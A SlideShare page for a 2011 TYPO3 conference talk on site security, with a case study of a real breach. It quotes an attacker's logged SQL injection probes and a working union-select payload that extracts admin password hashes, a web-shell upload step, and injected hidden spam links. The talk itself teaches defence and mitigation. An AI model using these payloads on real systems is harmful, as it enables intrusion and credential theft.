SlideShare uma empresa Scribd logo

TYPO Security - Risks and Mitigation of a TYPO3 Site Security Breach

Helmut Hummel
Helmut Hummel

The document discusses a presentation about TYPO3 security risks and mitigation. It begins with an introduction of the presenter and an overview of topics to be covered, including what security is, general security concepts, common attack vectors, a case study of how a hacker exploited a vulnerability, and methods for mitigating risks.

TecnologiaNegócios
1 de 76
TYPO3 Conference - San Francisco 2011 Inspiring TYPO Security - Risks and Mitigation sha
T3CON11 San Francisco TYPO Security - Risks and Mitigation 10.06.2011 Helmut Hummel <helmut.hummel@typo3.org>
Introduction About me Involved in TYPO3 project since 2005 Member of the TYPO3 Security Team since 2008 TYPO3 Security Team Leader since 2009 TYPO3 Core Team Member since 2011 Employed at naw.info in Hannover, Germany Twitter: helhum Blog: http://www.naw.info/blogs/typo3security/ Inspiring people to TYPO Security - Risks and Mitigation share
TYPO Security - Risks and Mitigation Agenda What is Security? General Security Concepts Attack Vectors Knowing the Enemy: A Case Story Mitigation TYPO3 Security Team Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Inspiring people to TYPO Security - Risks and Mitigation share
Is TYPO3 secure? Is my TYPO3 Site secure? Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Criteria for Security Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Criteria for Security Privacy Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Criteria for Security Privacy Integrity and Property Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Criteria for Security Privacy Integrity and Property Availability and Intentional Use Inspiring people to TYPO Security - Risks and Mitigation share
Security is a process, not a product. (Bruce Schneier) Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Security is a process Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Security is a process Care taking and improvements over time Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Security is a process Care taking and improvements over time Depending on your needs Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Security is a process Care taking and improvements over time Depending on your needs Nothing is secure! Something can only be not insecure at a particular time Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Why TYPO3 can be considered to be not insecure Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Why TYPO3 can be considered to be not insecure TYPO3 Security Team takes care Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Why TYPO3 can be considered to be not insecure TYPO3 Security Team takes care Highly customizable for your needs Inspiring people to TYPO Security - Risks and Mitigation share
What is Security? Why TYPO3 can be considered to be not insecure TYPO3 Security Team takes care Highly customizable for your needs Few critical Security issues over time Inspiring people to TYPO Security - Risks and Mitigation share
General Security Concepts Inspiring people to TYPO Security - Risks and Mitigation share
General Security Concepts General Security Concepts Inspiring people to TYPO Security - Risks and Mitigation share
General Security Concepts General Security Concepts Defense in depth Inspiring people to TYPO Security - Risks and Mitigation share
General Security Concepts General Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people to TYPO Security - Risks and Mitigation share
General Security Concepts General Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people to TYPO Security - Risks and Mitigation share
General Security Concepts General Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Inspiring people to TYPO Security - Risks and Mitigation share
General Security Concepts General Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Log Activities Inspiring people to TYPO Security - Risks and Mitigation share
Attack Vectors Inspiring people to TYPO Security - Risks and Mitigation share
Attack Vectors Attack Vectors Inspiring people to TYPO Security - Risks and Mitigation share
Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Inspiring people to TYPO Security - Risks and Mitigation share
Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Inspiring people to TYPO Security - Risks and Mitigation share
Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Inspiring people to TYPO Security - Risks and Mitigation share
Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Inspiring people to TYPO Security - Risks and Mitigation share
Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Inspiring people to TYPO Security - Risks and Mitigation share
Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Other Software on the webserver Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy The incident, how did it happen? <div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos- crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for- palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/ ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph- infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/ customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http:// yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</ a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165 Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for 3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt- crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo- v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/ restoreit-deluxe-edition-v301-crack.html">RestoreIT! Deluxe Edition v3.01 Crack</a> <a href="http:// tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06 build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff- crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser- bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb- password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http:// reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006 Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker 1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062- crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by- tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2- pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/ primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http:// fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks Matlab R2006b (3 cds) Crack</a> <a Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Searching for vulnerabilities 178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Searching for vulnerabilities 178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select +1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Searching for vulnerabilities 14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010 Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Searching for vulnerabilities 14:03:21: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010' Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Searching for vulnerabilities 14:03:42: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Searching for vulnerabilities 14:04:15: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 -- Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Found something! 14:04:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 order by 10 -- Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Forging the exploit 14:08:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Exploit working! 14:09:04: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=-2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,user name,password,admin)),20,21,22 from be_users where admin=1 -- Now the hacker has the md5 hashes of all admin passwords Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy 15 minutes later: Log in as admin! 14:21:48: /typo3/index.php 14:21:50: /typo3/backend.php Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Uploading web shell 14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/ typo3conf/ext/realurlmanagement/ 14:22:46: /typo3conf/ext/realurlmanagement/title.php You loose! Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Conclusion Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Conclusion Hackers know what they are doing Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack Inspiring people to TYPO Security - Risks and Mitigation share
Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack With automated attacks effort is low, gain is high Inspiring people to TYPO Security - Risks and Mitigation share
Mitigation Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Mandatory steps Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Mandatory steps Monitor and Back Up your Website Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Make your Integrators aware of possible TypoScript problems Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Advanced steps Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Inspiring people to TYPO Security - Risks and Mitigation share
Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Consider using phpids TYPO3 Extension Inspiring people to TYPO Security - Risks and Mitigation share
TYPO3 Security Team Inspiring people to TYPO Security - Risks and Mitigation share
TYPO3 Security Team Important things to know Inspiring people to TYPO Security - Risks and Mitigation share
TYPO3 Security Team Important things to know Responsible Disclosure Policy Inspiring people to TYPO Security - Risks and Mitigation share
TYPO3 Security Team Important things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Inspiring people to TYPO Security - Risks and Mitigation share
TYPO3 Security Team Important things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only Inspiring people to TYPO Security - Risks and Mitigation share
TYPO3 Security Team Important things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only You can support us Inspiring people to TYPO Security - Risks and Mitigation share
TYPO Security - Risks and Mitigation Rescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://typo3.org/teams/security/security- bulletins/ http://typo3.org/teams/security/resources/ http://buzz.typo3.org/teams/security/ Inspiring people to TYPO Security - Risks and Mitigation share
Questions? Inspiring people to TYPO Security - Risks and Mitigation share
Thank You! Inspiring people to TYPO Security - Risks and Mitigation share
inspiring people to share.

Recomendados

Web Application Security Workshop TYPO3 Developer Days 2014
Web Application Security Workshop TYPO3 Developer Days 2014Web Application Security Workshop TYPO3 Developer Days 2014
Web Application Security Workshop TYPO3 Developer Days 2014Helmut Hummel
 
Blaze Information Security: The cost of fixing security vulnerabilities in ea...
Blaze Information Security: The cost of fixing security vulnerabilities in ea...Blaze Information Security: The cost of fixing security vulnerabilities in ea...
Blaze Information Security: The cost of fixing security vulnerabilities in ea...Blaze Information Security
 
What a locked down law firm looks like updated
What a locked down law firm looks like updatedWhat a locked down law firm looks like updated
What a locked down law firm looks like updatedDenim Group
 
T3DD12 Security Workshop
T3DD12 Security WorkshopT3DD12 Security Workshop
T3DD12 Security WorkshopHelmut Hummel
 
Slides from IPv6 Threats
Slides from IPv6 ThreatsSlides from IPv6 Threats
Slides from IPv6 ThreatsCyren, Inc
 
Diary of a Hack
Diary of a HackDiary of a Hack
Diary of a HackHelmut Hummel
 
CYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiCYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiashwanip7461
 
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...CODE BLUE
 

Recomendados

Web Application Security Workshop TYPO3 Developer Days 2014
Web Application Security Workshop TYPO3 Developer Days 2014Web Application Security Workshop TYPO3 Developer Days 2014
Web Application Security Workshop TYPO3 Developer Days 2014Helmut Hummel
 
Blaze Information Security: The cost of fixing security vulnerabilities in ea...
Blaze Information Security: The cost of fixing security vulnerabilities in ea...Blaze Information Security: The cost of fixing security vulnerabilities in ea...
Blaze Information Security: The cost of fixing security vulnerabilities in ea...Blaze Information Security
 
What a locked down law firm looks like updated
What a locked down law firm looks like updatedWhat a locked down law firm looks like updated
What a locked down law firm looks like updatedDenim Group
 
T3DD12 Security Workshop
T3DD12 Security WorkshopT3DD12 Security Workshop
T3DD12 Security WorkshopHelmut Hummel
 
Slides from IPv6 Threats
Slides from IPv6 ThreatsSlides from IPv6 Threats
Slides from IPv6 ThreatsCyren, Inc
 
Diary of a Hack
Diary of a HackDiary of a Hack
Diary of a HackHelmut Hummel
 
CYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiCYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiashwanip7461
 
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...CODE BLUE
 
Reversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future RoadmapReversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future Roadmapsecurityxploded
 
Forget cyber, it's all about AppSec
Forget cyber, it's all about AppSecForget cyber, it's all about AppSec
Forget cyber, it's all about AppSecAdrien de Beaupre
 
Blue Ocean IT Security
Blue Ocean IT SecurityBlue Ocean IT Security
Blue Ocean IT SecurityJonathan Sinclair
 
T3DD10 Security Workshop
T3DD10 Security WorkshopT3DD10 Security Workshop
T3DD10 Security WorkshopHelmut Hummel
 
Security & App Development - CSO Summit Mid 2014
Security & App Development - CSO Summit Mid 2014Security & App Development - CSO Summit Mid 2014
Security & App Development - CSO Summit Mid 2014Amod Malviya (आमोद मालवीय, ಆಮೋದ ಮಾಲವೀಯ)
 
How to Secure America
How to Secure AmericaHow to Secure America
How to Secure AmericaSecurityStudio
 
O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?
O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?
O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?Izar Tarandach
 
ION-E Defense In Depth Presentation for The Institiute of Internal Auditors
ION-E Defense In Depth Presentation for The Institiute of Internal AuditorsION-E Defense In Depth Presentation for The Institiute of Internal Auditors
ION-E Defense In Depth Presentation for The Institiute of Internal Auditorsmdagrossa
 
Silver Lining for Miles: DevOps for Building Security Solutions
Silver Lining for Miles: DevOps for Building Security SolutionsSilver Lining for Miles: DevOps for Building Security Solutions
Silver Lining for Miles: DevOps for Building Security SolutionsSeniorStoryteller
 
ISSA-OC and Webster University Cybersecurity Seminar Series Presentation
ISSA-OC and Webster University Cybersecurity Seminar Series PresentationISSA-OC and Webster University Cybersecurity Seminar Series Presentation
ISSA-OC and Webster University Cybersecurity Seminar Series PresentationSecurityStudio
 
People Committed to Solving our Information Security Language Problem
People Committed to Solving our Information Security Language ProblemPeople Committed to Solving our Information Security Language Problem
People Committed to Solving our Information Security Language ProblemSecurityStudio
 
Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...
Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...
Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...AgileNetwork
 
SIEM Primer:
SIEM Primer:SIEM Primer:
SIEM Primer:Anton Chuvakin
 
Security revolutionized fosdem_20120205
Security revolutionized fosdem_20120205Security revolutionized fosdem_20120205
Security revolutionized fosdem_20120205David Fetter
 
Professor Martin Gill, Director, Perpetuity Research
Professor Martin Gill, Director, Perpetuity Research Professor Martin Gill, Director, Perpetuity Research
Professor Martin Gill, Director, Perpetuity Research CSSaunders
 
Commonwealth of Learning cybersecurity training for teachers | 2022
Commonwealth of Learning cybersecurity training for teachers | 2022Commonwealth of Learning cybersecurity training for teachers | 2022
Commonwealth of Learning cybersecurity training for teachers | 2022KharimMchatta
 
Building a Modern Security Engineering Organization
Building a Modern Security Engineering OrganizationBuilding a Modern Security Engineering Organization
Building a Modern Security Engineering OrganizationZane Lackey
 
Software Technical Design for Information Security: A short intro for Tech Le...
Software Technical Design for Information Security: A short intro for Tech Le...Software Technical Design for Information Security: A short intro for Tech Le...
Software Technical Design for Information Security: A short intro for Tech Le...Chris F Carroll
 
Cyber security vs information assurance
Cyber security vs information assuranceCyber security vs information assurance
Cyber security vs information assuranceVaughan Olufemi ACIB, AICEN, ANIM
 
End User Security Awareness Presentation
End User Security Awareness PresentationEnd User Security Awareness Presentation
End User Security Awareness PresentationCristian Mihai
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 

Mais conteúdo relacionado

Semelhante a TYPO Security - Risks and Mitigation of a TYPO3 Site Security Breach

Reversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future RoadmapReversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future Roadmapsecurityxploded
 
Forget cyber, it's all about AppSec
Forget cyber, it's all about AppSecForget cyber, it's all about AppSec
Forget cyber, it's all about AppSecAdrien de Beaupre
 
T3DD10 Security Workshop
T3DD10 Security WorkshopT3DD10 Security Workshop
T3DD10 Security WorkshopHelmut Hummel
 
O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?
O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?
O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?Izar Tarandach
 
ION-E Defense In Depth Presentation for The Institiute of Internal Auditors
ION-E Defense In Depth Presentation for The Institiute of Internal AuditorsION-E Defense In Depth Presentation for The Institiute of Internal Auditors
ION-E Defense In Depth Presentation for The Institiute of Internal Auditorsmdagrossa
 
Silver Lining for Miles: DevOps for Building Security Solutions
Silver Lining for Miles: DevOps for Building Security SolutionsSilver Lining for Miles: DevOps for Building Security Solutions
Silver Lining for Miles: DevOps for Building Security SolutionsSeniorStoryteller
 
ISSA-OC and Webster University Cybersecurity Seminar Series Presentation
ISSA-OC and Webster University Cybersecurity Seminar Series PresentationISSA-OC and Webster University Cybersecurity Seminar Series Presentation
ISSA-OC and Webster University Cybersecurity Seminar Series PresentationSecurityStudio
 
People Committed to Solving our Information Security Language Problem
People Committed to Solving our Information Security Language ProblemPeople Committed to Solving our Information Security Language Problem
People Committed to Solving our Information Security Language ProblemSecurityStudio
 
Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...
Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...
Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...AgileNetwork
 
Security revolutionized fosdem_20120205
Security revolutionized fosdem_20120205Security revolutionized fosdem_20120205
Security revolutionized fosdem_20120205David Fetter
 
Professor Martin Gill, Director, Perpetuity Research
Professor Martin Gill, Director, Perpetuity Research Professor Martin Gill, Director, Perpetuity Research
Professor Martin Gill, Director, Perpetuity Research CSSaunders
 
Commonwealth of Learning cybersecurity training for teachers | 2022
Commonwealth of Learning cybersecurity training for teachers | 2022Commonwealth of Learning cybersecurity training for teachers | 2022
Commonwealth of Learning cybersecurity training for teachers | 2022KharimMchatta
 
Building a Modern Security Engineering Organization
Building a Modern Security Engineering OrganizationBuilding a Modern Security Engineering Organization
Building a Modern Security Engineering OrganizationZane Lackey
 
Software Technical Design for Information Security: A short intro for Tech Le...
Software Technical Design for Information Security: A short intro for Tech Le...Software Technical Design for Information Security: A short intro for Tech Le...
Software Technical Design for Information Security: A short intro for Tech Le...Chris F Carroll
 
End User Security Awareness Presentation
End User Security Awareness PresentationEnd User Security Awareness Presentation
End User Security Awareness PresentationCristian Mihai
 

Semelhante a TYPO Security - Risks and Mitigation of a TYPO3 Site Security Breach (20)

Reversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future RoadmapReversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future Roadmap
 
Forget cyber, it's all about AppSec
Forget cyber, it's all about AppSecForget cyber, it's all about AppSec
Forget cyber, it's all about AppSec
 
Blue Ocean IT Security
Blue Ocean IT SecurityBlue Ocean IT Security
Blue Ocean IT Security
 
T3DD10 Security Workshop
T3DD10 Security WorkshopT3DD10 Security Workshop
T3DD10 Security Workshop
 
Security & App Development - CSO Summit Mid 2014
Security & App Development - CSO Summit Mid 2014Security & App Development - CSO Summit Mid 2014
Security & App Development - CSO Summit Mid 2014
 
How to Secure America
How to Secure AmericaHow to Secure America
How to Secure America
 
O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?
O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?
O'Reilly SACon 2019 - (Continuous) Threat Modeling - What works?
 
ION-E Defense In Depth Presentation for The Institiute of Internal Auditors
ION-E Defense In Depth Presentation for The Institiute of Internal AuditorsION-E Defense In Depth Presentation for The Institiute of Internal Auditors
ION-E Defense In Depth Presentation for The Institiute of Internal Auditors
 
Silver Lining for Miles: DevOps for Building Security Solutions
Silver Lining for Miles: DevOps for Building Security SolutionsSilver Lining for Miles: DevOps for Building Security Solutions
Silver Lining for Miles: DevOps for Building Security Solutions
 
ISSA-OC and Webster University Cybersecurity Seminar Series Presentation
ISSA-OC and Webster University Cybersecurity Seminar Series PresentationISSA-OC and Webster University Cybersecurity Seminar Series Presentation
ISSA-OC and Webster University Cybersecurity Seminar Series Presentation
 
People Committed to Solving our Information Security Language Problem
People Committed to Solving our Information Security Language ProblemPeople Committed to Solving our Information Security Language Problem
People Committed to Solving our Information Security Language Problem
 
Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...
Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...
Agile Chennai 2022 - Shyam Sundar | Everything there is to know about Cyber s...
 
SIEM Primer:
SIEM Primer:SIEM Primer:
SIEM Primer:
 
Security revolutionized fosdem_20120205
Security revolutionized fosdem_20120205Security revolutionized fosdem_20120205
Security revolutionized fosdem_20120205
 
Professor Martin Gill, Director, Perpetuity Research
Professor Martin Gill, Director, Perpetuity Research Professor Martin Gill, Director, Perpetuity Research
Professor Martin Gill, Director, Perpetuity Research
 
Commonwealth of Learning cybersecurity training for teachers | 2022
Commonwealth of Learning cybersecurity training for teachers | 2022Commonwealth of Learning cybersecurity training for teachers | 2022
Commonwealth of Learning cybersecurity training for teachers | 2022
 
Building a Modern Security Engineering Organization
Building a Modern Security Engineering OrganizationBuilding a Modern Security Engineering Organization
Building a Modern Security Engineering Organization
 
Software Technical Design for Information Security: A short intro for Tech Le...
Software Technical Design for Information Security: A short intro for Tech Le...Software Technical Design for Information Security: A short intro for Tech Le...
Software Technical Design for Information Security: A short intro for Tech Le...
 
Cyber security vs information assurance
Cyber security vs information assuranceCyber security vs information assurance
Cyber security vs information assurance
 
End User Security Awareness Presentation
End User Security Awareness PresentationEnd User Security Awareness Presentation
End User Security Awareness Presentation
 

Último

Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
